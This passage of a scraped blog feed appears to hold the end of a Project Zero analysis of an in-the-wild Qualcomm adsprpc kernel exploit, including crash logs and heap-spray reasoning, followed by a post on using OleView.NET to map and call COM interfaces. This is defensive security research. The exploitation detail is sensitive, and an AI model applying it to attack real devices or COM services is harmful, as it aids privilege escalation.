    This value is coming from map->fl->cid - so it seems exceedingly likely that whatever heap spray object the attacker used had a timestamp value at this offset location. Perhaps it would be possible to discover what object the attacker was heap spraying! After searching fruitlessly for cases of time-related members of variable-sized structs, my attention was drawn to kernel panic log 3:

    [ 2247.159424] Unable to handle kernel paging request at virtual address 006f7778a9cf5b88

    ...

    [ 2247.159719] Call trace:

    [ 2247.159727]  __kmalloc+0x1c4/0x398

    [ 2247.159740]  inotify_handle_event+0xc8/0x1c8

    [ 2247.159746]  fsnotify+0x270/0x378

    We see here a crash that occurred in a heap allocation crucially before the invalid channel id messages typically appeared in the log. Looking at inotify_handle_event more closely we see the following variable-sized allocation:

    int inotify_handle_event(struct fsnotify_group *group,

                             struct inode *inode,

                             u32 mask, const void *data, int data_type,

                             const unsigned char *file_name, u32 cookie,

                             struct fsnotify_iter_info *iter_info)

    {

            ...

            struct inotify_event_info *event;

            ...

            int alloc_len = sizeof(struct inotify_event_info);

            ...

            if (file_name) {

                    len = strlen(file_name);

                    alloc_len += len + 1;

            }

            ...

            event = kmalloc(alloc_len, GFP_KERNEL_ACCOUNT | __GFP_RETRY_MAYFAIL);

    I then compared the struct offsets for map->fl->cid and superimposed them onto a struct inotify_event_info object. We see that map->fl->cid aligns perfectly with event->fse.inode->i_mtime - the modification time for the file inode associated with the inotify event! Given that the cid is set to a timestamp value by the exploit, this makes perfect sense. It’s highly likely that part of the ITW exploit process involved spraying inotify_event_info objects in order to reclaim a UAF’d fastrpc_mmap struct (perhaps as part of an ASLR leak), and that the unrealistic channel id value is the modification time for whatever file the exploit used for the heap spray. Based on the pipe crash, it seems plausible it then reallocates the fastrpc_mmap struct with pipe buffers to gain full control of the underlying object. This, plus an info leak, would be more than enough to achieve code execution or arbitrary read/write.

    Conclusion

    It took less than 3 months of research to discover 6 separate bugs in the adsprpc driver, two of which (CVE-2024-49848 and CVE-2024-21455) were not fixed by Qualcomm under the industry standard 90-day deadline. Furthermore, at the time of writing, CVE-2024-49848 remains unfixed 145 days after it was reported. Past research has shown that chipset drivers for Android are a promising target for attackers, and this ITW exploit represents a meaningful real-world example of the negative ramifications that the current third-party vendor driver security posture poses to end-users. A system’s cybersecurity is only as strong as its weakest link, and chipset/GPU drivers represent one of the weakest links for privilege separation on Android in 2024. Improving both the consistency and quality of code and the efficiency of the third-party vendor driver patch dissemination process are crucial next steps in order to increase the difficulty of privilege escalation on Android devices.

    • ✇Project Zero
    • Windows Tooling Updates: OleView.NET Google Project Zero
      Posted by James Forshaw, Google Project ZeroThis is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on
       

    Windows Tooling Updates: OleView.NET

    12 de Dezembro de 2024, 20:27

    Posted by James Forshaw, Google Project Zero

    This is a short blog post about some recent improvements I've been making to the
    OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms.

    Using the OleView.NET Tooling

    Before we start the discussion it's important to understand how you can get hold of the OleView.NET tool and some basic usage. The simplest way to get the tooling is to install it from the PowerShell gallery with the Install-Module OleViewDotNet command. This installs both the PowerShell module and the GUI.

    Next you need to parse the COM registration artifacts into an internal database. You can do this by running the Get-ComDatabase command. Once it's finished you're ready to go. You will notice that it can take a long time to complete, so it'd be annoying to have to do this every time you want to start researching. For that reason you can use the command Set-ComDatabase -Default to write out the database to a default storage location. Now the next time you start PowerShell you can just run an inspection command, such as Get-ComClass and the default database will be automatically loaded.

    This default database is also shared with the GUI, which you can start by running the Show-ComDatabase command. For general research I find the GUI to be easier to use and you can click around and look at the COM registration information. For analysis, the ability to script through PowerShell is more important.

    Researching COM Services

    Performing security research in COM usually involves the following steps::

    • Enumerate potential COM classes of interest. These might be classes which are accessible outside of a sandbox, running at high privilege or designed to be remotely exposed.
    • Validate whether the COM classes are truly accessible from the attack position. COM has various security controls which determine what users can launch, activate and access an object. Understanding these security controls allows the list of COM classes of interest to be limited to only those that are actually part of the attack surface.
    • Enumerate exposed interfaces, determine what they do and call methods on them to test for security vulnerabilities.

    The last step is the focus of the updates to the tooling, making it easier to determine what an exposed interface does and call methods to test the behavior. The goal is to minimize the amount of reverse engineering needed (although generally some is still required) as well as avoid needing to write code outside of the tooling to interact with the COM service under test.

    To achieve this goal, OleView.NET will pull together any sources of interface information it has, then provide a mechanism to inspect and invoke methods on the interface through the UI or via PowerShell. The sources of information that it currently pulls together are:

    1. Known interfaces, either defined in the base .NET framework class libraries or inside OleView.NET.
    2. COM interface definitions present in the Global Assembly Cache.
    3. Registered type libraries.
    4. Windows Runtime interfaces.
    5. Extracted proxy class marshaling information.

    One useful benefit of gathering this information, is that the tool formats the interface as "source code" so you can manually inspect it.

    Formatting Interfaces Definitions

    The OleView.NET tool uses a database object to represent all the artifacts it has analyzed on your system. The latest released version defines some of these objects to be convertible to "source code". For example the following can be converted if the tool can determine some meta data that to represent the artifact:

    • COM interfaces
    • COM proxies
    • COM Windows Runtime classes.
    • Type libraries, interfaces and classes.

    How you get to this conversion depends on whether you're using the PowerShell or the UI. The simplest approach is PowerShell, using the ConvertTo-ComSourceCode command. For example, the following will convert an interface object into source code:

    PS> Get-ComInterface -Name IMyInterface | ConvertTo-ComSourceCode -Parse

    Note that we also need to pass a -Parse option to the command. Some metadata such as type libraries and proxies can be expensive to parse so it won't do that automatically. However, once they're been parsed in the current session the metadata is cached for further use, so for example if you formatted a single interface in a type library, all other interfaces are now also parsed and can be formatted.

    The output of this command is the converted "source code" as text. The format depends on metadata source. For example the following is the output from a Windows Runtime type:

    [Guid("155eb23b-242a-45e0-a2e9-3171fc6a7fdd")]

    interface IUserStatics

    {

        /* Methods */

        UserWatcher CreateWatcher();

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync();

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync(UserType type);

        IAsyncOperation<IReadOnlyList<User>> FindAllAsync(UserType type, 

                                           UserAuthenticationStatus status);

        User GetFromId(string nonRoamableId);

    }

    As Windows Runtime types are defined using metadata similar to .NET then the output is a pseudo C# format. In contrast for type library or proxy it's look more like the following:

    [

        odl,

        uuid(00000512-0000-0010-8000-00AA006D2EA4),

        dual,

        oleautomation,

        nonextensible

    ]

    interface _Collection : IDispatch {

        [id(1), propget]

        HRESULT Count([out, retval] int* c);

        [id(0xFFFFFFFC), restricted]

        HRESULT _NewEnum([out, retval] IUnknown** ppvObject);

        [id(2)]

        HRESULT Refresh();

    };

    This is in the Microsoft Interface Definition Language (MIDL) format, the type library version should be pretty accurate and could even be recompiled by the MIDL compiler. For proxies some of the information is lost and so the MIDL generated isn't completely accurate, but as we'll see later there's limited reasons to take the output and recompile.

    Another thing to note is that proxies lose name information when compiled from MIDL to their C marshaled representation. Therefore the tool just generates placeholder names, for example, method names are of the form "ProcN". If the proxy is for a type that has a known definition, such as from a Windows Runtime type or a type library then the tool will try and automatically apply the names. If not, you'll need to manually change them if you want them to be anything other than the default.

    You can change the names from PowerShell by modifying the proxy object directly. For example the "IBitsTest1" interface looks like the following before doing anything:

    [

      object,

      uuid(51A183DB-67E0-4472-8602-3DBC730B7EF5),

    ]

    interface IBitsTest1 : IUnknown {

        HRESULT Proc3([out, string] wchar_t** p0);

    }

    You can modify "Proc3" with the following script:

    PS> $proxy = Get-ComProxy -Iid 51A183DB-67E0-4472-8602-3DBC730B7EF5

    PS> $proxy.Procedures[0].Name = "GetBitsDllPath"

    PS> $proxy.Procedures[0].Parameters[0].Name = "DllPath"

    Now the formatted output looks like the following:

    [

      object,

      uuid(51A183DB-67E0-4472-8602-3DBC730B7EF5),

    ]

    interface IBitsTest1 : IUnknown {

        HRESULT GetBitsDllPath([out, string] wchar_t** DllPath);

    }

    This renaming will also be important when we come back to calling proxied methods. Obviously it'd be annoying to run this script every time, so you can cache the names using the following command:

    PS> Export-ComProxyName -Proxy $p -ToCache

    This will write out a file describing the names to a local cache file. When the proxy is loaded again in another session this cache file will be automatically applied. The Export-ComProxyName and corresponding Import-ComProxyName commands allow you to read and write XML or JSON files representing the proxy names which you can modify in a text editor if that's easier.

    One of the quickest wins is to enumerate the interfaces for a COM object, then pass the output of that through the ConvertTo-ComSource code command. For example:

    PS> $obj = New-ComObject -Clsid 4575438f-a6c8-4976-b0fe-2f26b80d959e

    PS> Get-ComInterface -Object $obj | ConvertTo-ComSourceCode -Parse

    This creates a new COM object based on its CLSID, enumerates the interfaces it supports and then passes them through the conversion process to get out a "source code" representation of the interfaces.

    To view the source code in the GUI you first need to open one of the database views from the Registry menu. In the resulting window, there will be a tree view of artifacts. You need to open the source code viewer window by right clicking the tree and selecting the Show Source Code option in the context menu. This will result in a view similar to the following:

    Screenshot showing the tooling, with the resulting window as described in the paragraph above

    You can also automatically enable the source code view from the View→Registry View Options menu. In that menu you can also enable automatically parsing the interface information, which is off by default.

    You might notice in the screenshot that there's some text which is underlined. This indicates names which can be changed, and it is only used for proxies. You can right click the name and choose Edit Name from the context menu to bring up a text entry dialog. You can then change the name to suit. If you want to persist the names between sessions then set the Save Proxy Names on Exit option in the registry view options. Then when you exit any modified proxies will be written to the cache.

    If you want to edit a proxy from PowerShell in a similar GUI you can use following command:

    PS> Edit-ComSourceCode $proxy

    This will show a dialog similar to the following where you can do edits to the proxy name information:

    Screenshot showing where you can do edits to the proxy name

    Genering Interfaces from a Proxy Definition

    Now on to the more important side of these updates, the ability to invoke methods on the interfaces exposed by an object you want to research. The tool has always given you some ability to invoke methods as long as the object has a .NET interface to call through reflection. This could either be through a known interface type, such as a built-in one or the Windows Runtime interfaces or by converting a type library into a .NET assembly on demand.

    What's new is the ability to generate an interface based on a proxy definition and then use that to invoke methods. Initially I tried to implement this by generating an .NET interface dynamically which would then use the existing .NET interop to call the proxy methods. This worked fine for simple proxies but quickly hit problems when doing anything more complex:

    • Some types are hard to represent in easy to use .NET types, such as pointers to structures. This is "handled" in the type library converter by just exporting them as IntPtr parameters which means the caller has to manually marshal the data. Get this wrong and the tool crashes.
    • Any structures need to be accurately laid out so the native marshaler can read and write to the correct field locations. Get this wrong and the tool crashes.
    • Did I mention that if you get this wrong the tool crashes?

    Fortunately I already had a solution, my sandbox library already had the ability to dynamically generate a .NET class from parsed NDR data, in fact I was already using the library to parse the NDR data for proxies so I realized could I repurpose the existing client builder for COM proxy clients. I needed to do some simple refactoring of the code to make it build from a COM proxy instance rather than an RPC server, but I quickly had an RPC client. This RPC client doesn't directly interact with any native marshaling code, so it's unlikely to crash. Also any complex structures are built in a way which makes it easy to modify from .NET removing the problems around pointers. One issue with using the RPC client method is the same interface could be used for both in-process and out-of-process objects. Due to the way COM is designed a client usually doesn't need to care about where the object is, but in this case it must be accessible via a proxy. This isn't that big an issue, there's no security boundary between in-process COM objects and so being able to call methods on them isn't that interesting.

    The next problem was the RPC transport. COM calls have an additional input and output parameter, the ORPTHIS and ORPCTHAT structures, that need to be added to the call. These parameters could have been added to the RPC client, but it would seem best to make the clients agnostic of the transport. Instead as my RPC code has pluggable RPC transport I was able to reimplement a custom version over the top of the existing ALPC and TCP transports which added the additional parameters to any call. That wasn't the end of it though, ALPC needs an additional pair of parameters, LocalThis and LocalThat, which are potentially different depending on versions of Windows. Also you need to add support for additional services such as the OXID resolver and communication with the local DCOM activator. While I implemented all this it wasn't as reliable as I'd like, however it's still present in the source code if you want to play with it.

    As an aside, I should point out that Clement Rouault, one of the original researchers into ALPC RPC protocol of which parts of my own implementation is inspired, recently released a very similar project for their Python tooling which implements the ALPC DCOM protocol.

    I decided that I'd need a different approach, in the COM runtime the RPC channel used by a proxy instance is represented by the IRpcChannelBuffer interface. An object implementing this interface is connected to the proxy during initialization, it is then used to send and receive NDR formatted data from the client to the server. The implementation handles all the idiosyncrasies such as the additional parameters, handling OXID resolving and reference counting. If we could get hold of a proxy object's instance of the IRpcChannelBuffer object, we could use that instead of implementing our own protocol, the challenge was how to get it.

    After a bit of research I found that we can use the documented NdrProxyInitialize function to get hold of the interface from its MIDL_STUB_MESSAGE structure by passing in the interface pointer to a proxy. While it wouldn't be as flexible as a fully custom implementation this gave me an easy way to handle the transport without worrying about platform or protocol differences. It could also work from an existing COM object, just query the appropriate interface, extract the buffer and make calls to the remote server.

    Of course nothing is that simple, I discovered that while the IRpcChannelBuffer object is a COM object it has a broken implementation of IMarshal. As .NET's COM interop tries to query for IMarshal when generating a Runtime Callable Wrapper, it will immediately crash the process. I had to manually dispatch the calls to the method through native delegates, but at least it works.

    Calling Interface Methods

    Okay, so how do you use the tool to call arbitrary methods? For the GUI it works like it always has, when you create an instance of a COM object, usually by right clicking an entry in a view and selecting Create Instance you'll get a new object information window similar to the following:

    Screenshot showing what happens when you right-click on an entry in a view and select create instance

    At the bottom of the window is a list of supported interfaces. In the right column is an indicator if there's a viewer for that interface. If it's set to Yes, then you can double click it to bring up an invocation window like the following:

    Screenshot of the OleView .NET tooling showing the invoked method

    From this window you can double click a method to bring up a new dialog where you can specify the arguments and invoke the method as shown below.

    Screenshot of Invoke GetBitsDllPath showing that the operation completed successfully

    Once invoked it'll show the resulting output parameters and if the return value is an integer will assume it's a HRESULT error code. These windows are the same for "reflected" interfaces such as type libraries and Windows Runtime interfaces as well as proxy clients. The names of proxy methods won't be automatically updated if you change them when the interface window is open. You'll need to go back to the object information window and double click the interface again to get it to recreate the client.

    For PowerShell you can specify an Iid argument when using the New-ComObject command or use the Get-ComObjectInterface command to query an existing COM object for a new interface. The tooling will pick the best option for calling the interface from the options available to it, including generating the RPC client dynamically.

    PS> $obj = New-ComObject -Clsid 4991D34B-80A1-4291-83B6-3328366B9097

    PS> $test = Get-ComObjectInterface $o -Iid 51A183DB-67E0-4472-8602-3DBC730B7EF5

    PS> $test.GetBitsDllPath()

    DllPath                      retval

    -------                      ------

    c:\windows\system32\qmgr.dll      0

    To make it easier to call interface methods from PowerShell the exposed methods on the object will be modified to wrap output parameters in a single return value. You can see this in the listing above, the DllPath parameter was originally an output only parameter. Rather than deal with  that in the script a return structure was automatically created containing the DllPath as well as the HRESULT return value. If the parameter is an input and output then the method signature accepts the input value and the return value contains the output value.

    If the definitions for your interface don't already exist you can import them into the tool to be used by the automatic interface selection. To do this you'll need to define the interfaces as .NET types and compile them into an assembly. Then in the GUI use the File→Import Interop Assembly menu option or for PowerShell use the Add-ComObjectInterface command. Both of these options allow you to specify the assembly will be automatically loaded the next time you start the tool. This will make a copy of the DLL to a central location so that it can be accessed even if you delete the library later.

    If all you have is an IDL file for a set of COM interfaces you can import them into the tool indirectly with help from the Windows SDK. First compile the IDL file using the MIDL compiler to generate a type library, then use the TLBIMP command to generate an Assembly file from the type library. Finally you can import it using the previous paragraph's methods.

    There's plenty to discover in OleView.NET which I've not covered here. I'd encourage you to play around, or check out the source code on github.

    ❌
    ❌